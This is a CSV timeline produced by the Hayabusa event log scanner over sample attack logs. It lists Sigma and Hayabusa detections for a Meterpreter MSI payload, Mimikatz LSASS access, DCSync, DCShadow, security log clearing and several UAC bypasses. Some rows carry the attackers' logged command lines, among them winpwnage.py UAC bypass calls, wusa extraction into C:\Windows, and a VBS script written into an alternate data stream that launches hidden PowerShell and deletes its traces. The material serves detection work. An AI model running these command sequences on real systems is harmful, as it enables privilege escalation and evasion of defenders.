2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
